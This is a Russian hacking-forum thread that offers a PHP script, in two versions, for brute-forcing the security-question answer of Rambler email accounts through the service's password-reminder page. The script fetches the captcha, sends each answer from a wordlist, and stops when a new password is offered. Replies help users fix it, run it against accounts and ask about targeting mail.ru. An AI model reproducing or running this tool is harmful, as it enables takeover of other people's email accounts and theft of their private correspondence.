Форум АНТИЧАТ - брутим....ответ на контрольный вопрос

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - брутим....ответ на контрольный вопрос (https://forum.antichat.xyz/showthread.php?t=182331)

брутим....ответ на контрольный вопрос

Дело было вечером, делать было нефига как общаться по аське, в этот раз фигней страдали с zifanchuck'ом профиль моего большого ачатовского друга вот http://forum.antichat.ru/member.php?userid=66836 Ну что- дискутировали по поводу- а можно ли подобрать брутом ответ на контрольный вопрос? Обьектом нашего изучения стал рамблер, и вот как мы непытались вручную (путем многократных запросов) уйти в бан- так нифига и неудавалось.... (каптчу просили ввести только один, самый первый раз ), вот на этой волне и родился данный скрипт который мы предоставляем Вашему вниманию. А еще у нас с ним пари- как быстро админы рамблера прикроют откровенный баг))) (на много слов не тестили но после 200-300 неправильных находит правильный ответ), ответы нужно складывать в файл my.txt (в столбик- разумееться :D )
А да и чтоб было все по честному в скрипте проостенькая защита от школьников, так что неспрашивайте почему выдает ошибку при подключении))) Ну а сам скрипт собственно говоря вот))
P.S. И прошу не пинать так как данный скрипт писался для того чтоб удовлетворить наше любопытство и цель создания орудия для вскрытия ящиков перед нами не стояла))

PHP код:


		
			
<?php

// (c)Kusto & zifanchuck

//for forum.antichat.ru

set_time_limit(0);

function curl($url,$post)

{

$cfile = 'cookies.txt';

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);

curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

curl_setopt($ch, CURLOPT_POST, 1);

$result = curl_exec($ch);

curl_close($ch);

return $result;

}





    function read($path)

{

   $file=fopen($path,"r");

   $bufer = fread($file,filesize($path));

   fclose($file);

   return($bufer);

}



$file = 'my.txt';

$domain = $_POST['domain'];

$login = $_POST['login'];



$result = curl('http://id.rambler.ru/script/reminder.cgi','');

$result = iconv("utf-8", "windows-1251", $result);





//получаем адрес каптчи

preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);

$c=$cap[1];

$id=$cap[2];





if($login)

{

$res = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$_POST['id']."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$_POST['captcha']."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0  %B8%D1%82%D1%8C"));

preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$res, $qves)

}



if ($qves[1])

{

echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";

$a = explode("\r\n",read($file));



for($i=0;$i<count($a);$i++)

{

$fam = $a[$i];

$bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));

if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}

else {echo "ответ $fam не подошел <br>";}

flush();

}



}

else { echo "<B><U><FONT SIZE=5 COLOR=RED>Внимательно заполняем каптчу</FONT></U></B></br>";







     echo  '    <label for="captcha">Введите показанные на&nbsp;картинке символы:</label><br><br><br>

        <span id="captcha-wrapper" title="Введите показанные на картинке символы">

            <span class="secimage-wrapper">

                <img id="secimage" src="'.$c.'" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы">

                <span class="dummy"></span>

            </span><br><br>

            <form name="captcha_form" method="POST">

          <input type="text" name="captcha" value="" /><br>

          <input type="hidden" name="id" value="'.$id.'" />

            ';

  $err = '

  <html>

<head>



<body bgcolor=#c0c0c0>

 <form method="POST">



<p align=center>



                <label for="id-login">кого брутим?</label>

                <span class="indicator">

                    <input type="text" class="text" name="login" />



                    <select id="id-domain" class="text" name="domain" tabindex="1">

                        <option value="rambler.ru"  >@rambler.ru</option>

                        <option value="lenta.ru"  >@lenta.ru</option>



                        <option value="myrambler.ru"  >@myrambler.ru</option>

                        <option value="autorambler.ru"  >@autorambler.ru</option>

                        <option value="ro.ru"  >@ro.ru</option>

                        <option value="r0.ru"  >@r0.ru</option>

                    </select>



                </span><br><br><br><br><br><br>





<input type=submit value="ПОЕХАЛИ!!!">





           </form>

         </center>

</body>

<head>

</html>';

echo $err;

}

?>

Цитата:

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");

случаем не защита от школьников ? )

нет-чуть ниже)))
P.S. ошибкуж выдает где косяк- кто хоть чуть чуть знает основы пыха- зделать рабочим скрипт дело одной секунды

мб пригодится. за старания +

В каком виде должны быть кукисы которые в cookies.txt ? :(

Цитата:

В каком виде должны быть кукисы которые в cookies.txt ?

Скрипт сам туда запишет че надо=)

zifanchuck - большое спасибо, Kusto тебе тоже, понаставил бы вам плюсов да больше одного не могу((( также я не грин так что они ничего не стоят(

Цитата:

Может еще подскажешь как обойти загадочную защиту от Школьнегов ? o_O

смотри личку

блин, с мозже поднимали эту тему дня 4 назад =\
спасибо за реализацию ;)

Цитата:

Warning: curl_setopt() [function.curl-setopt]: CURLOPT_FOLLOWLOCATION cannot be activated when in safe_mode or an open_basedir is set in /home/junfan/public_html/bals.php on line 16

типо надо safe_mode on ? А этот хостинг неподходит ?

Цитата:

Сообщение от seofilms

типо надо safe_mode on ? А этот хостинг неподходит ?

на денвер ставь- и вообще хостинги нелюбят брут...

Цитата:

на денвер ставь- и вообще хостинги нелюбят брут...

всё заработало, теперь ввел мыло которое собрался брутить, вылетел секр. вопрос но не вижу где статус прогреса брута, так и должно быть ? (Cори за тупые вопросы) :)

Пофиксенно (исправленн скрипт в 1 посте)

Цитата:

так и должно быть (сначала на своем испытай)

ok, спс, а с одного IP можно только один брутить ?

можно несколько

Цитата:

Сообщение от seofilms

Прошу прошение за небольшой косяк))))- скрипт был написанн на коленке и сообщает только о найденом пассе- счас добавим чтоб сообщал если все ответы неверны :D :D (еще раз прошу прощение)))
ИСПРАВЛЕННО в первом посте (защиту от школьников сохранил в том-же месте)

x3 наверно этот не для моего ума(((
на деневере пишет : Fatal error: Call to undefined function curl_init() in Y:\home\localhost\www\bals.php on line 8
На шелле всё норм, только 123 уже х3 сколько подбирает)))
http://efedor.ru/img/menu/bals.php вот готовый брут, который у меня к сожалению не работает(

Цитата:

Сообщение от seofilms

у тебя на денвере CURL неустановлен

Во всём разобрался, на сегодняшний день скрипт работает, большое спасибо :)
Пашет с хоста :)

только что провел тест- поставил правильный ответ на 999 позицию (т е запросов к серверу было порядка 1000) за 9 минут скрипт подобрал правильный ответ на вопрос
P.S. Это тем кто стучиться мне в личку с проьбами снять пресловутую "защиту" либо узнать скорость перебора)))

еще работает эта тема?))

Подскажите как исправить ошибку? Плиз )

Цитата:

Сообщение от anti4at

Подскажите как исправить ошибку? Плиз )

актуален сегодня скрипт или нет - незнаю (думаю что нет), ошибка- как я и говорил- детская, в 49 строке пропущенна ; (мы ведь с вами уже большие и знаем что в пыхе логическим завершением функции являеться- ; ) , можете затестить, если не работает и вы выложите свой вариант - рабочий, - подниму репутацию (как я и говорил мне просто неинтересна поддержка скрипта т к ислледования были чисто из любопытства)

P.S. А да еще посмотрел скрипт- и увидел что форум в него всобачил пробел при отправке запроса к серваку....

По идее скрипт должен быть ещё актуален так как багу никто не прикрывал и походу не собираются

Цитата:

Parse error: syntax error, unexpected '}' in /var/upppp/1.php on line 50

Хм...и в чём проблема? :D

Цитата:

Сообщение от sir95

Хм...и в чём проблема? :D

уже-ж сняли защиту от скрипткидди, неужели 49 строку трудно закончить с помощью ; ???
https://forum.antichat.ru/showpost.php?p=2099570&postcount=23

А точно)), сори.
Но капчу не показывает :confused:

Цитата:

Сообщение от sir95

А точно)), сори.
Но капчу не показывает :confused:

так подкорректируйте- неужели сложно? вродеж писали что багу неубрали, и я вроде выше писал что поддержка скрипта мне не интересна и если выложиш рабочий вариант здесь- подниму репу....(будет видно что не очередной скрипт кидди а думающий пользователь)

Скрипт все еще рабочий, но не могу подкоректировать, что-бы каптчу показывал...

Цитата:

Сообщение от vbcreate

Скрипт все еще рабочий, но не могу подкоректировать, что-бы каптчу показывал...

для меня вообще загадка что там сложного????? адрес капчи имеет вид http://id.rambler.ru/captcha/e5a412b61b86c8ff4dbe3cd1b7126fa2.jpg и вот этот хеш(e5a412b61b86c8ff4dbe3cd1b7126fa2) дергаем с регуляркой из адреса http://id.rambler.ru/script/reminder.cgi а конкретно из этой строчки

<input type="hidden" name="user.password" value="" />e5a412b61b86c8ff4dbe3cd1b7126fa2
(хеш разумееться каждый раз новый)
Так обьясните мне- неграмотному- чего здесь сложного????? (либо из другого там помоему 4 места откуда можно его дернуть....)

Капчу пробовал сделать...
но увы не получилось
_ttp://test5.6te.net/index.php

PHP код:


		
			
//получаем адрес каптчи 

preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result, $cap);

не знаю что сделать с этой частью

ап подправьте кто нибудь скрипт.

Интересует данная тема.
И такой вопрос: кто-нибудь брутил на mail.ru?

Апдейт скрипта. Наверное последний. Сегодня просто сложились звезды, что я был не занят и мне было не впадлу что-то делать (такое бывает очень редко))))

вот

PHP код:


		
			
<?php

// (c)Kusto & zifanchuck V2

//for forum.antichat.ru

set_time_limit(0);

function curl($url,$post)

{

$cfile = 'cookies.txt';

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

curl_setopt($ch, CURLOPT_COOKIEJAR, $cfile);

curl_setopt($ch, CURLOPT_COOKIEFILE, $cfile);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

curl_setopt($ch, CURLOPT_POST, 1);

$result = curl_exec($ch);

curl_close($ch);

return $result;

}





    function read($path)

{

   $file=fopen($path,"r");

   $bufer = fread($file,filesize($path));

   fclose($file);

   return($bufer);

}



$file = 'my.txt';

$domain = $_POST['domain'];

$login = $_POST['login'];

$captcha = $_POST['captcha'];

$id = $_POST['id'];





if(!$domain||!$login||!$captcha||!$id)

{



$result = curl('http://id.rambler.ru/script/reminder.cgi','');

$result = iconv("utf-8", "windows-1251", $result);



//получаем адрес каптчи

preg_match('#<img id="secimage" src="http://id.rambler.ru/captcha/(.*).jpg"#iU',$result, $cap);

$id=$cap[1];



    echo '<form method="POST">

            <p align=center>

                <label for="id-login">кого брутим?</label>

                <span class="indicator">

                    <input type="text" class="text" name="login" />

                    <select id="id-domain" class="text" name="domain" tabindex="1">

                        <option value="rambler.ru"  >@rambler.ru</option>

                        <option value="lenta.ru"  >@lenta.ru</option>

                        <option value="myrambler.ru"  >@myrambler.ru</option>

                        <option value="autorambler.ru"  >@autorambler.ru</option>

                        <option value="ro.ru"  >@ro.ru</option>

                        <option value="r0.ru"  >@r0.ru</option>

                    </select>

                </span><br>

                <img id="secimage" src="http://id.rambler.ru/captcha/'.$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>

            Капча:<input type="text" name="captcha" value="" /><br>

          <input type="hidden" name="id" value="'.$id.'" />

            <input type=submit value="ПОЕХАЛИ!!!"></form>';

    exit;

}

else

{

$answers = explode("\r\n",read($file));



$result = iconv("utf-8", "windows-1251", curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$id."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$captcha."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0    %B8%D1%82%D1%8C"));

preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$result, $qves);



    if ($qves[1])

    {

    echo "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";



        for($i=0;$i<count($answers);$i++)

        {

        $fam = $answers[$i];

        $bien = iconv("utf-8", "windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251", "utf-8",$fam))));

        if (strstr($bien, "новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}

        else {echo "ответ $fam не подошел <br>";}

        flush();

        }



    }

    else

    {

            echo '<form method="POST">

            <p align=center>

                <b>Неправильно ввели каптчу!</b><br>

                <label for="id-login">кого брутим?</label>

                <span class="indicator">

                    <input type="text" class="text" name="login" />

                    <select id="id-domain" class="text" name="domain" tabindex="1">

                        <option value="rambler.ru"  >@rambler.ru</option>

                        <option value="lenta.ru"  >@lenta.ru</option>

                        <option value="myrambler.ru"  >@myrambler.ru</option>

                        <option value="autorambler.ru"  >@autorambler.ru</option>

                        <option value="ro.ru"  >@ro.ru</option>

                        <option value="r0.ru"  >@r0.ru</option>

                    </select>

                </span><br>

                <img id="secimage" src="http://id.rambler.ru/captcha/'.$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>

            Капча:<input type="text" name="captcha" value="" /><br>

          <input type="hidden" name="id" value="'.$id.'" />

            <input type=submit value="ПОЕХАЛИ!!!"></form>';

    }

}

?>

допишу сюда ссылку на исправленную версию
https://forum.antichat.ru/thread206154.html
чтоб не потерялась...

и добавлю в закладки на случай если пригодиться...

---
ЗЫ zifanchuck наверно меня опередил и уже запостил апдейт выше

Цитата:

Я как раз для той темы и писал скрипт))) ну точнее не только для нее, а просто попал сегодея на темку, посмотрел что не только тот чел хочет скрипт и решил допилить)